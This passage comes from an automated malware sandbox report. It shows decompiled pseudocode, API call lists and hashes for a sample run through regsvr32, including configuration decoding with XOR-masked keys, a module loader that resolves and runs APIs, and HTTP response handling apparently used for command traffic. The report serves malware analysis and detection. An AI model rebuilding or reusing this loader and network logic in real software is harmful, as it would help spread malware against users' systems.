						_t49 = E04F9572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x4f9a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x4f9a31c; // 0x69b25f44
						_t50 = E04F9572F(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x4f9a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x4f9a31c; // 0x69b25f44
								_t51 = E04F9572F(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04F91760(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04F94DFF();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x4f9a31c; // 0x69b25f44
								_t52 = E04F9572F(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04F91760(0, _t52) != 0) {
								_t121 =  *0x4f9a3cc; // 0x5ac95b0
								E04F91000(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x4f9a31c; // 0x69b25f44
								_t53 = E04F9572F(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x4f9a320; // 0xb2d5a8
								_t22 = _t54 + 0x4f9b252; // 0x616d692f
								 *0x4f9a370 = _t22;
								goto L60;
							} else {
								_t64 = E04F91760(0, _t53);
								 *0x4f9a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x4f9a31c; // 0x69b25f44
										_t56 = E04F9572F(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x4f9a320; // 0xb2d5a8
										_t23 = _t57 + 0x4f9b791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04F91760(0, _t56);
									}
									 *0x4f9a3e0 = _t58;
									HeapFree( *0x4f9a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                    0x04f94ef3
                    0x04f94ef3
                    0x04f94ef3
                    0x04f94ef3
                    0x04f94ef6
                    0x04f94f13
                    0x04f94f21
                    0x04f94f21
                    0x04f94f26
                    0x04f94f40
                    0x04f951ae
                    0x04f951b5
                    0x04f951b9
                    0x04f951b9
                    0x04f94f46
                    0x04f94f4b
                    0x04f94f63
                    0x04f9519b
                    0x04f951a5
                    0x00000000
                    0x04f94f69
                    0x04f94f69
                    0x04f94f6a
                    0x04f94f6f
                    0x04f94f85
                    0x04f94f71
                    0x04f94f71
                    0x04f94f7e
                    0x04f94f7e
                    0x04f94f89
                    0x04f94f90
                    0x04f94f92
                    0x04f94f9c
                    0x04f94fa1
                    0x04f94fa1
                    0x04f94f9c
                    0x04f94fa8
                    0x04f94fbe
                    0x04f94faa
                    0x04f94faa
                    0x04f94fb7
                    0x04f94fb7
                    0x04f94fc2
                    0x04f94fc4
                    0x04f94fce
                    0x04f94fd3
                    0x04f94fd3
                    0x04f94fce
                    0x04f94fda
                    0x04f94ff0
                    0x04f94fdc
                    0x04f94fdc
                    0x04f94fe9
                    0x04f94fe9
                    0x04f94ff4
                    0x04f94ff6
                    0x04f95000
                    0x04f95005
                    0x04f95005
                    0x04f95000
                    0x04f9500c
                    0x04f95022
                    0x04f9500e
                    0x04f9500e
                    0x04f9501b
                    0x04f9501b
                    0x04f95026
                    0x04f95028
                    0x04f95032
                    0x04f95037
                    0x04f95037
                    0x04f95032
                    0x04f9503e
                    0x04f95054
                    0x04f95040
                    0x04f95040
                    0x04f9504d
                    0x04f9504d
                    0x04f95058
                    0x04f9505a
                    0x04f95064
                    0x04f95069
                    0x04f95069
                    0x04f95064
                    0x04f95070
                    0x04f95086
                    0x04f95072
                    0x04f95072
                    0x04f9507f
                    0x04f9507f
                    0x04f9508a
                    0x04f9509d
                    0x04f9509d
                    0x00000000
                    0x04f9508c
                    0x04f9508c
                    0x04f95096
                    0x00000000
                    0x04f950a7
                    0x04f950a7
                    0x04f950a9
                    0x04f950bf
                    0x04f950ab
                    0x04f950ab
                    0x04f950b8
                    0x04f950b8
                    0x04f950c3
                    0x04f950c5
                    0x04f950c8
                    0x04f950c9
                    0x04f950d0
                    0x04f950d2
                    0x04f950d3
                    0x04f950d3
                    0x04f950d0
                    0x04f950da
                    0x04f950f0
                    0x04f950dc
                    0x04f950dc
                    0x04f950e9
                    0x04f950e9
                    0x04f950f4
                    0x04f95102
                    0x04f9510c
                    0x04f9510c
                    0x04f95114
                    0x04f9512a
                    0x04f95116
                    0x04f95116
                    0x04f95123
                    0x04f95123
                    0x04f9512e
                    0x04f95141
                    0x04f95141
                    0x04f95146
                    0x04f9514c
                    0x00000000
                    0x04f95130
                    0x04f95133
                    0x04f9513a
                    0x04f9513f
                    0x04f95151
                    0x04f95153
                    0x04f95169
                    0x04f95155
                    0x04f95155
                    0x04f95162
                    0x04f95162
                    0x04f9516d
                    0x04f95179
                    0x04f9517e
                    0x04f9517e
                    0x04f9516f
                    0x04f95172
                    0x04f95172
                    0x04f9518c
                    0x04f95191
                    0x04f95197
                    0x00000000
                    0x04f9519a
                    0x00000000
                    0x04f9513f
                    0x04f9512e
                    0x04f95096
                    0x04f9508a

                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F94F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F94FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F94FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F9502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F95060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04F95092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04F95191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04F951A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 531289f9fee70c1b004c71ebf374d1296e865d1758c5fedf321efc2b895d126c
                    • Instruction ID: b154f43cdc42e84fd891e21dd4ceca8e3fd4570493af82b9eb9f204578ca63aa
                    • Opcode Fuzzy Hash: 531289f9fee70c1b004c71ebf374d1296e865d1758c5fedf321efc2b895d126c
                    • Instruction Fuzzy Hash: 01818072F0024ABBFF22DFB4AC84D5B77E9EB487447245925A401D7204EA3AFD478B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03690A64 Relevance: .2, Instructions: 176COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                    • Instruction ID: ca7700acd34ee5d80a3c1f80e74a5181d3dff78c34db2fe56ed49bf25cc0a9ad
                    • Opcode Fuzzy Hash: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                    • Instruction Fuzzy Hash: DE611A35900119DFEF24DF50DE84AAAB7B9FF84328F1981D6D8096B215D330AE95CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03690B14 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                    • Instruction ID: c8b92ef96ac1f8c6e3e20e2608a2bd8ee5d38a8134a65d6435dd9bd4230803d8
                    • Opcode Fuzzy Hash: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                    • Instruction Fuzzy Hash: 1E412C3590011ADFEF14DF44DE84AA9B7B9FF44324F1991D6D8086B216D331AE85DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03690BFC Relevance: .1, Instructions: 103COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                    • Instruction ID: db8d7b56a727def380f97b8d8d496f049eab0a45fa3f7645a5f64449306a4cea
                    • Opcode Fuzzy Hash: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                    • Instruction Fuzzy Hash: AE41257690021ADFEF20DF44CA84BA9B7B9FB48324F1985D6D9096B216D330EE85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03690CE8 Relevance: .1, Instructions: 86COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                    • Instruction ID: f96c34bb69797eb0c7778676b7feb73908d12c1269af1aa959cde46d1b2c94a8
                    • Opcode Fuzzy Hash: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                    • Instruction Fuzzy Hash: C5311376A00215DFEF24DF54CE84BA9B7B9FF88724F198599D9096B316D330A980CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03690C57 Relevance: .1, Instructions: 71COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.811246868.0000000003690000.00000040.00000001.sdmp, Offset: 03690000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_3690000_regsvr32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                    • Instruction ID: 0f4ee62f955b4071e79a9804bac63eef47a835922e3fdf7c3f81b46e1ca4b312
                    • Opcode Fuzzy Hash: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                    • Instruction Fuzzy Hash: FC21F53690011ADFEF20DF04CA84BA9B7B9FB48324F1995D6C9096B316D330EA85CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9196A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E04F9196A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04F9624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04F97961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4f9a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4f9a320; // 0xb2d5a8
					_t18 = _t47 + 0x4f9b3e6; // 0x73797325
					_t68 = E04F91E10(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4f9a320; // 0xb2d5a8
						_t19 = _t50 + 0x4f9b747; // 0x5ac8cef
						_t20 = _t50 + 0x4f9b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04F96381();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04F96381();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4f9a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04F917AB(_t70);
				goto L12;
			}


















                    0x04f91972
                    0x04f91972
                    0x04f91981
                    0x04f9198a
                    0x04f9198d
                    0x04f91a9a
                    0x04f91aa1
                    0x04f91aa1
                    0x04f9199c
                    0x04f919a4
                    0x04f919a9
                    0x04f919ac
                    0x04f919c1
                    0x04f919c7
                    0x04f919c8
                    0x04f919cb
                    0x04f919d1
                    0x04f919d4
                    0x04f919d9
                    0x04f919e1
                    0x04f919ed
                    0x04f919f1
                    0x04f91a81
                    0x04f919f7
                    0x04f919f7
                    0x04f919fc
                    0x04f91a03
                    0x04f91a17
                    0x04f91a1b
                    0x04f91a6a
                    0x04f91a1d
                    0x04f91a1e
                    0x04f91a25
                    0x04f91a3e
                    0x04f91a40
                    0x04f91a44
                    0x04f91a4b
                    0x04f91a65
                    0x04f91a4d
                    0x04f91a56
                    0x04f91a5b
                    0x04f91a5b
                    0x04f91a4b
                    0x04f91a79
                    0x04f91a79
                    0x04f919f1
                    0x04f91a88
                    0x04f91a91
                    0x04f91a95
                    0x00000000

                    APIs
                      • Part of subcall function 04F9624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F91986,?,?,?,?,00000000,00000000), ref: 04F96274
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F96296
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F962AC
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F962C2
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F962D8
                      • Part of subcall function 04F9624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F962EE
                    • memset.NTDLL ref: 04F919D4
                      • Part of subcall function 04F91E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04F919ED,73797325), ref: 04F91E21
                      • Part of subcall function 04F91E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F91E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,05AC8CEF,73797325), ref: 04F91A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 04F91A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F91A79
                      • Part of subcall function 04F96381: GetProcAddress.KERNEL32(36776F57,04F9793C), ref: 04F9639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 04F91A56
                    • CloseHandle.KERNEL32(?), ref: 04F91A5B
                    • GetLastError.KERNEL32(00000001), ref: 04F91A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 098eabd5c9fd0906f0e71c43b6aca4420a9b3687389998a116f90b4901256df5
                    • Instruction ID: 2e3692f5c06fb8f48511fb0cf5107f44dcea6022ce0f12c942e8ff2d2bff5e93
                    • Opcode Fuzzy Hash: 098eabd5c9fd0906f0e71c43b6aca4420a9b3687389998a116f90b4901256df5
                    • Instruction Fuzzy Hash: 9A313DB6D00219BFFF10AFA4DD88D9EBBF8EB08344F004569E506E7110DB75AE468B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9266A Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 43%
                    			E04F9266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x4f9a3dc; // 0x5ac9c00
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E04F92E72();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E04F92E72();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04F92F7B(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04F92F7B(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04F91289(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x4f9918c;
						}
						_t70 = E04F91DDD(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E04F963FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x4f9a320; // 0xb2d5a8
								_t102 =  *0x4f9a134; // 0x4f97ca9
								_t28 = _t105 + 0x4f9bb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04F91289(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4f99190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E04F963FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E04F917AB(_v24);
								} else {
									_t92 =  *0x4f9a320; // 0xb2d5a8
									_t44 = _t92 + 0x4f9bc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E04F917AB(_v8);
						}
						E04F917AB(_v12);
					}
					E04F917AB(_v16);
				}
				return _v28;
			}



































                    0x04f92670
                    0x04f92678
                    0x04f9267b
                    0x04f92688
                    0x04f9268b
                    0x04f92692
                    0x04f92699
                    0x04f9269c
                    0x04f926a9
                    0x04f926ac
                    0x04f926af
                    0x04f926b6
                    0x04f926b9
                    0x04f926c1
                    0x04f926c8
                    0x04f926cb
                    0x04f926d1
                    0x04f926d5
                    0x04f926de
                    0x04f926e2
                    0x04f926e4
                    0x04f926e4
                    0x04f926ec
                    0x04f926f3
                    0x04f926f6
                    0x04f926fc
                    0x04f92703
                    0x04f92714
                    0x04f9271b
                    0x04f9272d
                    0x04f92734
                    0x04f92737
                    0x04f92740
                    0x04f92749
                    0x04f92752
                    0x04f92768
                    0x04f9276d
                    0x04f92771
                    0x04f92775
                    0x04f9277c
                    0x04f9277f
                    0x04f92781
                    0x04f92781
                    0x04f9278b
                    0x04f92794
                    0x04f9279b
                    0x04f927b7
                    0x04f927bb
                    0x04f927f4
                    0x04f927bd
                    0x04f927c0
                    0x04f927c8
                    0x04f927d9
                    0x04f927e1
                    0x04f927e9
                    0x04f927ed
                    0x04f927ed
                    0x04f927bb
                    0x04f927fc
                    0x04f927fc
                    0x04f92804
                    0x04f92804
                    0x04f9280c
                    0x04f9280c
                    0x04f92818

                    APIs
                    • GetTickCount.KERNEL32 ref: 04F92682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 04F92703
                    • lstrlen.KERNEL32(?), ref: 04F92714
                    • lstrlen.KERNEL32(00000000), ref: 04F9271B
                    • lstrlenW.KERNEL32(80000002), ref: 04F92722
                    • lstrlen.KERNEL32(?,00000004), ref: 04F9278B
                    • lstrlen.KERNEL32(?), ref: 04F92794
                    • lstrlen.KERNEL32(?), ref: 04F9279B
                    • lstrlenW.KERNEL32(?), ref: 04F927A2
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: 75c912fb675af163e1cca7d0805858072e520239578911d51b2f3ea0dbbc018a
                    • Instruction ID: 53cf4fe71ab66e5ad3470f5f442923824862e6cfbe99d468a9a8ef6d02ee5b13
                    • Opcode Fuzzy Hash: 75c912fb675af163e1cca7d0805858072e520239578911d51b2f3ea0dbbc018a
                    • Instruction Fuzzy Hash: 9D518D72D0021ABBEF11AFA5DC44EDE7BF5EF44314F064465E904A7260DB35AE12DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F958EE Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F958EE(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04F963FD(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04F917AB(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04F95867( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                    0x04f958ee
                    0x04f958ee
                    0x04f958fe
                    0x04f95901
                    0x04f95905
                    0x04f9590d
                    0x04f95910
                    0x04f95929
                    0x04f9593d
                    0x04f95944
                    0x04f9594b
                    0x04f9599e
                    0x04f959a7
                    0x04f959aa
                    0x04f959e5
                    0x04f959eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f959aa
                    0x04f95951
                    0x00000000
                    0x04f95958
                    0x04f95966
                    0x04f95969
                    0x04f9596c
                    0x04f95978
                    0x04f9597c
                    0x04f959de
                    0x04f9597e
                    0x04f95990
                    0x04f959ce
                    0x04f959d9
                    0x04f95992
                    0x04f95995
                    0x04f95999
                    0x04f95999
                    0x04f95990
                    0x00000000
                    0x04f9597c
                    0x04f95951
                    0x04f95915
                    0x04f9591b
                    0x04f95920
                    0x04f95923
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f959b3
                    0x04f959bb
                    0x04f959c2
                    0x04f959c2
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04F95905
                    • SetEvent.KERNEL32(?), ref: 04F95915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04F95947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9598C
                    • GetLastError.KERNEL32 ref: 04F9599E
                      • Part of subcall function 04F95867: WaitForMultipleObjects.KERNEL32(00000002,04F97AF8,00000000,04F97AF8,?,?,?,04F97AF8,0000EA60), ref: 04F95882
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • GetLastError.KERNEL32(00000000), ref: 04F959D3
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: 4809fef1a9b0a03e8dd0fb0d3d568156c360a46d2640ebd14fe4e686f66fef0f
